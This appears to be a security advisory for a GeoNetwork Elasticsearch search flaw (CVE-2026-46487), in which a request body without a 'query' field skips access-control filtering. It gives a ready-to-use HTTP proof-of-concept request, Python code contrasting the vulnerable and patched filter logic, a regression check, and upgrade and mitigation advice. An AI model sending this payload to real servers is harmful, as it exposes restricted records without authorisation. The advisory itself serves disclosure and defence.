CVE-2026-46487: GeoNetwork Elasticsearch Search ACL Bypass via Missing Query Field
An unauthenticated attacker can retrieve restricted metadata records from GeoNetwork by sending a search request that omits the query field, causing the access-control filter injection to be skipped e
The problem
GeoNetwork 4.x proxies all Elasticsearch search requests through a filter layer that injects group-based visibility rules, draft exclusions, ownership checks, and portal filters before forwarding to the index.
A logic flaw in that injection step means it only fires when the incoming JSON body contains a top-level `query` key. A body that omits `query` (for example, one containing only `size`, `_source`, or `aggs`) bypasses the check entirely. The raw request reaches Elasticsearch with no ACL constraints, exposing all indexed metadata including records limited to specific groups, draft records, and records that should be portal-scoped.
Proof of concept
A working proof-of-concept for CVE-2026-46487 in org.geonetwork-opensource:geonetwork, with the exact payload below.
```http
POST /geonetwork/srv/api/search/records/_search HTTP/1.1
Host: <target>
Content-Type: application/json

{
  "size": 100,
  "_source": ["uuid", "resourceTitleObject", "groupOwner", "owner", "isPublishedToAll"],
  "sort": [{"_score": "desc"}]
}
```

The root cause is CWE-862 (Missing Authorization): the filter-injection code path is guarded by a condition that checks for the presence of a `query` node in the request body, so a body without that node skips the guard and forwards a completely unconstrained query to Elasticsearch.
The patch adds an unconditional ACL filter application step that runs regardless of whether a `query` field is present, ensuring the `bool` filter clauses (group visibility, draft status, ownership, portal scope) are always merged into the outgoing Elasticsearch request.
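The pre-patch and patched injection shapes side by side, as an added illustrative example in Python (not GeoNetwork's own Java code): the ACL clauses are constructed from the fields the advisory payload projects, and `has_acl_filter` is an assumed assurance check you could run against the proxy's outgoing requests.

```python
import copy

# Constructed: the exact body from the advisory, which carries no top-level "query".
ADVISORY_BODY = {
    "size": 100,
    "_source": ["uuid", "resourceTitleObject", "groupOwner", "owner", "isPublishedToAll"],
    "sort": [{"_score": "desc"}],
}


def build_acl_filter(user_id, group_ids):
    """Constructed visibility clause: public, or owned by one of the caller's groups,
    or owned by the caller. GeoNetwork's real filter also covers drafts and portal scope."""
    return {
        "bool": {
            "should": [
                {"term": {"isPublishedToAll": True}},
                {"terms": {"groupOwner": list(group_ids)}},
                {"term": {"owner": user_id}},
            ],
            "minimum_should_match": 1,
        }
    }


def inject_acl_vulnerable(body, acl_filter):
    """Pre-patch logic: the ACL is merged only when a 'query' key is present,
    so a body with just size/_source/aggs is forwarded unconstrained."""
    out = copy.deepcopy(body)
    if "query" in out:
        out["query"] = {"bool": {"must": [out["query"]], "filter": [acl_filter]}}
    return out


def inject_acl_fixed(body, acl_filter):
    """Patched logic: the ACL is merged unconditionally; a missing user query
    is treated as match_all so the filter still applies to aggregations and hits."""
    out = copy.deepcopy(body)
    user_query = out.get("query", {"match_all": {}})
    out["query"] = {"bool": {"must": [user_query], "filter": [acl_filter]}}
    return out


def has_acl_filter(es_request, acl_filter):
    """Assurance check: True only if the outgoing request carries the ACL clause."""
    query = es_request.get("query")
    if not isinstance(query, dict):
        return False
    return acl_filter in query.get("bool", {}).get("filter", [])
```

Running `has_acl_filter` over the proxy's outgoing bodies is a cheap regression check that any request, with or without a `query`, leaves the filter layer constrained.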
No public PoC has been published; this payload is derived directly from the advisory's stated trigger condition (omitting the `query` field) and the documented search endpoint behaviour.
The fix
Upgrade to GeoNetwork 4.4.11 or later (the first release containing the unconditional ACL filter guard). If an immediate upgrade is not possible, restrict unauthenticated access to `/srv/api/search/records/_search` and `/_msearch` at the reverse-proxy or WAF layer until the patch can be applied.
Related research
- CVE-2026-47424: OpenAM Authenticated Groovy Sandbox Escape to RCE (high)
- CVE-2026-46619: OpenAM MSISDN Authentication Bypass via LDAP Injection (high)
- CVE-2026-46623: OpenAM OAuth2 Module Account Takeover via Unverified Password Change (high)
- CVE-2026-45048: OpenAM Authenticated Privilege Escalation via Session RPC Token Disclosure (high, 8.5)